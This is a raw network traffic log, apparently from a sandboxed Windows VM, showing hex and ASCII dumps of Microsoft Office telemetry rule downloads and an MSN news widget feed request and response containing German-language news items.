2025-01-09 16:23:54 UTC	16384	IN	Data Raw: 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: rsion="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr
2025-01-09 16:23:54 UTC	16384	IN	Data Raw: 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 34 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 53 65 76 65 72 69 74 79 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 55 4c 53 5f 53 65 76 65 72 69 74 79 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 35 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 4d 65 73 73 61 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 6e 74 65 78 74 44 61 74 61 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 36 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 53 51 4d 4d 61 63 68 69 6e 65 49 44 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 4d 61 63 68 69 6e 65 Data Ascii: <C T="W" I="4" O="true" N="Severity"> <S T="5" F="ULS_Severity" M="Ignore" /> </C> <C T="W" I="5" O="true" N="Message"> <S T="5" F="ContextData" M="Ignore" /> </C> <C T="W" I="6" O="true" N="SQMMachineID"> <S T="5" F="Machine
2025-01-09 16:23:54 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 31 35 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 45 72 72 6f 72 4d 65 73 73 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 31 36 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 72 72 6f 72 44 65 74 61 69 6c 73 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 45 72 72 6f 72 44 65 74 61 69 6c 73 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 31 37 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 53 63 65 6e 61 72 69 6f 53 75 62 54 79 70 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 53 63 65 6e 61 72 69 6f 53 75 Data Ascii: <C T="W" I="15" O="false" N="ErrorMessage"> <S T="2" F="ErrorMessage" /> </C> <C T="W" I="16" O="false" N="ErrorDetails"> <S T="2" F="ErrorDetails" /> </C> <C T="W" I="17" O="true" N="ScenarioSubType"> <S T="2" F="ScenarioSu
2025-01-09 16:23:54 UTC	16384	IN	Data Raw: 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4e 45 22 3e 0d 0a 20 Data Ascii: </R> </O> </R> </O> </L> <R> <O T="AND"> <L> <O T="NE">
2025-01-09 16:23:54 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4e 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 55 4c 53 5f Data Ascii: </R> </O> </L> <R> <O T="NE"> <L> <S T="1" F="ULS_
2025-01-09 16:23:54 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4e 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 55 4c 53 5f 54 61 67 22 20 2f Data Ascii: <O T="AND"> <L> <O T="AND"> <L> <O T="NE"> <L> <S T="1" F="ULS_Tag" /
2025-01-09 16:23:54 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 45 76 65 6e 74 53 61 6d 70 6c 69 6e 67 50 6f 6c 69 63 79 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 39 31 22 20 54 3d 22 55 38 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4e 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <O T="LT"> <L> <S T="1" F="EventSamplingPolicy" /> </L> <R> <V V="191" T="U8" /> </R> </O> </L> <R> <O T="NE">

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:23:55 UTC	199	OUT	GET /rules/rule120603v9s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro) Host: otelrules.svc.static.microsoft
2025-01-09 16:23:55 UTC	515	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:23:55 GMT Content-Type: text/xml Content-Length: 2231 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B99C0CEBF" x-ms-request-id: 1a444d6b-b01e-005c-0952-624c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20250109T162355Z-156796c549bhs5pchC1EWRwsn800000018800000000059hf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2025-01-09 16:23:55 UTC	2231	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 39 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="9" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:23:55 UTC	199	OUT	GET /rules/rule120607v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro) Host: otelrules.svc.static.microsoft
2025-01-09 16:23:55 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:23:55 GMT Content-Type: text/xml Content-Length: 204 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6C8527A" x-ms-request-id: 6d6a897f-301e-0051-7eae-6238bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20250109T162355Z-156796c549bkmhc6hC1EWRrra8000000191g00000000akyk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2025-01-09 16:23:55 UTC	204	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:24:13 UTC	881	OUT	GET /service/news/feed/pages/dashboard4?aver=1.1.200.0&over=10.0.22631.4169.amd64fre.ni_release.220506-1250&fring=Retail&devicetype=1&oem=VMware%2C%20Inc.&smode=false&machineId=%7BADA0F343-6E11-4C03-89DA-546517CD1A62%7D&clv=3.0&hver=524.30502.30.0&locale=en-US&region=CH&apikey=lxSNtibdZ45aPe8BHuUR6XwhuuruYfwejEYNpSqgcd&ocid=winp2widget&timeOut=2000&activityId=79a55ed2-c536-4feb-b823-3a9b5e5c40be&user=m-339A2A61895267C400B83F3088FA6607&cm=de-ch&caller=bgtask&theme=light&nw=false&msrc=2&it=app&scn=al_app_anon&clientFeatures=1 HTTP/1.1 Referer: https://windows.msn.com/ Accept-Encoding: gzip, deflate muid: 339A2A61895267C400B83F3088FA6607 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0 Host: assets.msn.com Connection: Keep-Alive Cookie: MUID=339A2A61895267C400B83F3088FA6607
2025-01-09 16:24:15 UTC	3712	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 DDD-AuthenticatedWithJwtFlow: False DDD-UserType: AnonymousMuid DDD-TMPL: XFeed;spotlight:1;RR:0;ATFSignalTriggered:1;click28d_0;TaggingUserActionSignal;cptvtn_a-0_sr-0_nw-0_t-0;tmpl-video;PageViewCount0;tmpl-promotedad:1;FCRelBarP_0.32;TileID:dr5r;wxunt:_C;triggercf;RelevanceWarmUser;WxLockScreen:Weather3DLock_Alert;StrongDemotionV2Trigger:0;1s-ondemand-promotedad;IsRecoNewUser:1;IMArticleNegUser:0;RecoSource:Notification_;wpo-coldstart:1;P2DeviceWithEL;ULatLon40.75:-73.99;StableIdCS:339A2A61895267C400B83F3088FA6607;triggercf_5_cfxeverything_0;tmpl-1spromoondmd;WxCardValid:1;UserHasActionSignal:0;v_MainFeedsColdUser:true;tmpl-cc;SageUser:0;eePosList:0;UserProfileActionSignal:0;InterestCount:0;UserCohortByEngagement28d:0;GANone:1;IsRandomized;FCTarget\|4\|0.6_2\|0.33_3\|0.07_0\|0.15;ClickCohort:0;MyFeed;XAIG:8_0;IsRandomized:1;ExplcitFollowCohort:0;GEM:C;numofmutepub:0;XAIG:100_0;FixIds:0;wxpkg:1.866.0;tmpl-cgtopstories:1;FCSupply#2\|65_3\|37_4\|34;ATFSignalTriggered:0;click_0;tmpl-tmpltlayout;UIC#t1_6\|0\|0\|0.26;v_click_0;tmpl-pr2wbv2:1;v_click28d_0;winbadge:1;RecoSource:Sage_;Sag [TRUNCATED] DDD-StrategyExecutionLatency: 00:00:00.9383340 x-wpo-activityId: D78CE336-AF2D-47D8-AAA9-192433613045\|2025-01-09T16:24:14.8939468Z\|fabric_wpo\|SEA-C\|WPO_129 DDD-FeatureSet: 0,Msn.OneDataService.Search.FeatureTracker.Models.NewsFeedFeature:wgAA; DDD-ActivityId: d78ce336-af2d-47d8-aaa9-192433613045 DDD-FeedNewsItemCount: 31 DDD-TMPL-Removed: False DDD-DebugId: d78ce336-af2d-47d8-aaa9-192433613045\|2025-01-09T16:24:14.9252778Z\|fabric_winfeed\|SEA-C\|WinFeed_2115 DDD-Auth-Features: AT:NA;DID:m-339A2A61895267C400B83F3088FA6607;IT:App;MuidStateOrigin:MuidFromHeader OneWebServiceLatency: 940 X-MSEdge-ResponseInfo: 940 X-1S-FallbackReason: RetryOnThrottling X-Ceto-ref: 677ff82de06e4f7d945898de149caf9b\|AFD:677ff82de06e4f7d945898de149caf9b\|2025-01-09T16:24:13.981Z Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 911C034563E84CA9BA81AB06CDEDD689 Ref B: FRA31EDGE0113 Ref C: 2025-01-09T16:24:13Z Expires: Thu, 09 Jan 2025 16:24:15 GMT Date: Thu, 09 Jan 2025 16:24:15 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Set-Cookie: _C_ETH=1; domain=.msn.com; path=/; secure; httponly Set-Cookie: _C_Auth= Set-Cookie: msnup=; expires=Sat, 22 Feb 2025 16:24:14 GMT; domain=.msn.com; path=/; secure; samesite=none; httponly Set-Cookie: MUIDB=339A2A61895267C400B83F3088FA6607; expires=Tue, 03 Feb 2026 16:24:14 GMT; path=/; httponly Set-Cookie: _EDGE_S=SID=058BA9AA6DB06A8F0CF1BCC56C0A6B33; domain=.msn.com; path=/; httponly Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.38.99.141,b=7298626,c=g,n=DE_HE_FRANKFURT,o=20940],[a=204.79.197.203,c=o] Server-Timing: clientrtt; dur=86, clienttt; dur=1106, origin; dur=1104, cdntime; dur=2, wpo;dur=31,1s;dur=793 Akamai-Cache-Status: NotCacheable from child Akamai-Server-IP: 23.38.99.141 Akamai-Request-ID: 6f5e42 X-AS-SuppressSetCookie: 1 Cache-Control: private, max-age=0 report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Timing-Allow-Origin: * Akamai-GRN: 0.8d632617.1736439853.6f5e42 Vary: Origin
2025-01-09 16:24:15 UTC	12672	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 6e 65 78 74 50 61 67 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 6d 73 6e 2e 63 6f 6d 2f 6e 65 77 73 2f 66 65 65 64 2f 70 61 67 65 73 2f 64 61 73 68 62 6f 61 72 64 34 3f 61 63 74 69 76 69 74 79 49 64 3d 37 39 61 35 35 65 64 32 2d 63 35 33 36 2d 34 66 65 62 2d 62 38 32 33 2d 33 61 39 62 35 65 35 63 34 30 62 65 26 74 69 6d 65 4f 75 74 3d 32 30 30 30 26 6f 63 69 64 3d 77 69 6e 70 32 77 69 64 67 65 74 26 73 63 6e 3d 61 6c 5f 61 70 70 5f 61 6e 6f 6e 26 61 70 69 6b 65 79 3d 6c 78 53 4e 74 69 62 64 5a 34 35 61 50 65 38 42 48 75 55 52 36 58 77 68 75 75 72 75 59 66 77 65 6a 45 59 4e 70 53 71 67 63 64 26 63 6d 3d 64 65 2d 63 68 26 55 73 65 72 3d 6d 2d 33 33 39 41 32 41 36 31 38 39 35 32 36 37 43 34 30 30 42 38 33 46 Data Ascii: 00006000{"nextPageUrl":"https://api.msn.com/news/feed/pages/dashboard4?activityId=79a55ed2-c536-4feb-b823-3a9b5e5c40be&timeOut=2000&ocid=winp2widget&scn=al_app_anon&apikey=lxSNtibdZ45aPe8BHuUR6XwhuuruYfwejEYNpSqgcd&cm=de-ch&User=m-339A2A61895267C400B83F
2025-01-09 16:24:15 UTC	11916	IN	Data Raw: 36 33 30 2c 22 71 75 61 6c 69 74 79 22 3a 39 39 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 6d 67 2d 73 2d 6d 73 6e 2d 63 6f 6d 2e 61 6b 61 6d 61 69 7a 65 64 2e 6e 65 74 2f 74 65 6e 61 6e 74 2f 61 6d 70 2f 65 6e 74 69 74 79 69 64 2f 42 42 31 72 39 6f 76 31 2e 69 6d 67 22 2c 22 74 69 74 6c 65 22 3a 22 57 69 65 20 76 69 65 6c 65 20 4d 69 6e 75 74 65 6e 20 73 6f 6c 6c 74 65 6e 20 53 69 65 20 65 6e 74 73 70 72 65 63 68 65 6e 64 20 49 68 72 65 6d 20 41 6c 74 65 72 20 73 70 61 7a 69 65 72 65 6e 20 67 65 68 65 6e 3f 22 2c 22 63 61 70 74 69 6f 6e 22 3a 22 3c 70 3e 53 70 61 7a 69 65 72 65 6e 67 65 68 65 6e 20 69 73 74 20 73 61 6e 66 74 20 66 c3 bc 72 20 64 65 6e 20 4b c3 b6 72 70 65 72 2c 20 6c 65 69 63 68 74 20 61 6e 70 61 73 73 62 61 72 20 75 6e 64 20 62 Data Ascii: 630,"quality":99,"url":"https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1r9ov1.img","title":"Wie viele Minuten sollten Sie entsprechend Ihrem Alter spazieren gehen?","caption":"<p>Spazierengehen ist sanft fr den Krper, leicht anpassbar und b
2025-01-09 16:24:15 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 6e 6b 65 6e 2e 20 44 65 72 20 47 65 77 69 6e 6e 73 63 68 65 69 6e 20 77 75 72 64 65 20 69 6e 20 64 65 72 20 52 65 67 69 6f 6e 20 46 72 65 69 62 75 72 67 20 65 69 6e 67 65 6c c3 b6 73 74 2e 20 45 69 6e 20 7a 77 65 69 74 65 72 20 47 65 77 69 6e 6e 65 72 20 6f 64 65 72 20 65 69 6e 65 20 47 65 77 69 6e 6e 65 72 69 6e 20 68 61 74 74 65 20 73 65 63 68 73 20 5a 61 68 6c 65 6e 20 72 69 63 68 74 69 67 20 61 6e 67 65 6b 72 65 75 7a 74 20 75 6e 64 20 6b 61 73 73 69 65 72 74 65 20 65 69 6e 65 20 4d 69 2e 2e 2e 22 2c 22 72 65 61 64 54 69 6d 65 4d 69 6e 22 3a 31 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 64 65 2d 63 68 2f 6e 61 63 68 72 69 63 68 74 65 6e 2f 6f 74 68 65 72 2f 31 31 2d 35 36 2d 6d 69 Data Ascii: 00006000nken. Der Gewinnschein wurde in der Region Freiburg eingelst. Ein zweiter Gewinner oder eine Gewinnerin hatte sechs Zahlen richtig angekreuzt und kassierte eine Mi...","readTimeMin":1,"url":"https://www.msn.com/de-ch/nachrichten/other/11-56-mi
2025-01-09 16:24:15 UTC	8204	IN	Data Raw: 3a 22 31 6b 4c 30 76 41 6f 38 36 7a 65 67 6b 2d 61 45 50 66 6c 72 48 48 74 35 41 6d 22 2c 22 73 6f 75 72 63 65 22 3a 22 6d 73 6e 22 7d 2c 7b 22 69 64 22 3a 22 42 42 31 72 61 63 32 53 22 2c 22 74 79 70 65 22 3a 22 61 72 74 69 63 6c 65 22 2c 22 74 69 74 6c 65 22 3a 22 53 65 6c 65 6e 73 6b 79 6a 20 62 69 74 74 65 74 20 75 6d 20 47 65 6c 64 20 66 c3 bc 72 20 75 6b 72 61 69 6e 69 73 63 68 65 20 44 72 6f 68 6e 65 6e 70 72 6f 64 75 6b 74 69 6f 6e 22 2c 22 61 62 73 74 72 61 63 74 22 3a 22 44 65 72 20 75 6b 72 61 69 6e 69 73 63 68 65 20 50 72 c3 a4 73 69 64 65 6e 74 20 57 6f 6c 6f 64 79 6d 79 72 20 53 65 6c 65 6e 73 6b 79 6a 20 68 61 74 20 64 69 65 20 50 61 72 74 6e 65 72 6c c3 a4 6e 64 65 72 20 7a 75 72 20 55 6e 74 65 72 73 74 c3 bc 74 7a 75 6e 67 20 64 65 72 20 Data Ascii: :"1kL0vAo86zegk-aEPflrHHt5Am","source":"msn"},{"id":"BB1rac2S","type":"article","title":"Selenskyj bittet um Geld fr ukrainische Drohnenproduktion","abstract":"Der ukrainische Prsident Wolodymyr Selenskyj hat die Partnerlnder zur Untersttzung der
2025-01-09 16:24:15 UTC	11283	IN	Data Raw: 30 30 30 30 32 43 30 37 0d 0a 48 61 75 70 74 73 74 61 64 74 20 4e 27 44 6a 61 6d 65 6e 61 20 65 69 6e 67 65 64 72 75 6e 67 65 6e 20 73 65 69 6e 2e 20 31 38 20 64 65 72 20 41 6e 67 72 65 69 66 65 72 20 73 65 69 65 6e 20 67 65 74 c3 b6 74 65 74 20 75 6e 64 20 64 2e 2e 2e 22 2c 22 72 65 61 64 54 69 6d 65 4d 69 6e 22 3a 32 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 64 65 2d 63 68 2f 6e 61 63 68 72 69 63 68 74 65 6e 2f 69 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 2f 72 65 67 69 65 72 75 6e 67 2d 64 65 73 2d 74 73 63 68 61 64 2d 64 65 73 74 61 62 69 6c 69 73 69 65 72 75 6e 67 73 76 65 72 73 75 63 68 2d 76 65 72 65 69 74 65 6c 74 2f 61 72 2d 42 42 31 72 39 57 31 7a 22 2c 22 6c 6f 63 61 6c 65 22 3a 22 64 65 2d 63 68 22 2c 22 69 Data Ascii: 00002C07Hauptstadt N'Djamena eingedrungen sein. 18 der Angreifer seien gettet und d...","readTimeMin":2,"url":"https://www.msn.com/de-ch/nachrichten/international/regierung-des-tschad-destabilisierungsversuch-vereitelt/ar-BB1r9W1z","locale":"de-ch","i
2025-01-09 16:24:15 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 6e 65 77 73 22 2c 22 6c 61 73 74 46 72 65 41 63 74 69 6f 6e 54 69 6d 65 73 74 61 6d 70 22 3a 30 2c 22 66 65 65 64 43 6f 6d 70 6f 73 69 74 69 6f 6e 43 61 74 65 67 6f 72 79 22 3a 22 32 22 7d 2c 22 63 61 72 64 49 64 22 3a 31 30 2c 22 69 73 57 6f 72 6b 4e 65 77 73 43 6f 6e 74 65 6e 74 22 3a 66 61 6c 73 65 2c 22 72 65 61 73 6f 6e 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 32 55 22 2c 22 72 61 6e 6b 22 3a 30 7d 5d 2c 22 72 69 22 3a 22 33 33 37 22 2c 22 72 65 63 6f 49 64 22 3a 22 31 6b 4c 66 53 51 56 5a 6c 66 58 66 45 43 32 72 66 50 66 46 71 51 33 53 41 6d 22 2c 22 73 6f 75 72 63 65 22 3a 22 6d 73 6e 22 7d 5d 7d 2c 7b 22 64 61 74 61 54 65 6d 70 6c 61 74 65 22 3a 22 34 63 32 72 2d 36 63 61 72 64 73 2d 74 32 22 2c 22 6c 61 79 6f 75 74 Data Ascii: 00004000news","lastFreActionTimestamp":0,"feedCompositionCategory":"2"},"cardId":10,"isWorkNewsContent":false,"reasons":[{"type":"u2U","rank":0}],"ri":"337","recoId":"1kLfSQVZlfXfEC2rfPfFqQ3SAm","source":"msn"}]},{"dataTemplate":"4c2r-6cards-t2","layout
2025-01-09 16:24:15 UTC	12	IN	Data Raw: 75 73 6d 6f 64 65 6c 6c 2c 20 0d 0a Data Ascii: usmodell,
